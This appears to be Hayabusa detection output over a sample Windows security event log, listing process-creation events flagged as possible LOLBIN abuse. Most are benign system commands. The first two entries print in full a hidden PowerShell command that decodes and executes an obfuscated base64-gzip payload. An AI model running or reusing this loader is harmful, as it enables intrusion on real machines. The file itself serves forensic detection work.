0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4592016-08-19 05:40:21.261 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4602016-08-19 05:40:21.464 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4612016-08-19 06:05:56.876 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4622016-08-19 06:06:09.220 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4632016-08-19 06:06:09.236 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4642016-08-19 07:54:48.720 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4652016-08-19 07:54:49.720 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4662016-08-19 07:54:49.751 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4672016-08-19 07:55:08.329 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4682016-08-19 08:06:57.658 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4692016-08-19 08:06:57.658 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4702016-08-19 11:07:47.630 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4712016-08-19 11:07:48.599 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4722016-08-19 11:07:48.599 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4732016-08-19 11:08:02.052 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4742016-08-19 11:08:08.052 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4752016-08-19 11:12:51.579 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4762016-08-19 11:12:51.579 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4772016-08-19 11:19:46.662 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4782016-08-19 11:19:47.615 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4792016-08-19 11:19:47.615 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4802016-08-19 11:20:06.599 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4812016-08-19 11:20:16.443 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4822016-08-19 11:20:16.443 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4832016-08-19 11:20:16.834 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4842016-08-19 22:57:54.738 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4852016-08-19 22:57:55.301 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4862016-08-19 22:57:59.004 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4872016-08-19 22:58:15.410 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4882016-08-19 22:59:20.128 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4892016-08-19 23:01:29.243 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4902016-08-20 01:01:36.820 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4912016-08-20 01:01:36.883 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4922016-08-20 01:01:36.898 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4932016-08-20 01:03:36.695 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4942016-08-20 01:57:08.802 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4952016-08-20 02:02:48.677 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4962016-08-20 02:02:52.614 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4972016-08-20 05:09:55.671 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4982016-08-20 05:09:57.781 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4992016-08-20 05:10:11.609 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5002016-08-20 05:10:17.702 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5012016-08-20 05:12:20.805 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5022016-08-20 05:12:20.805 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5032016-08-20 05:47:30.057 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
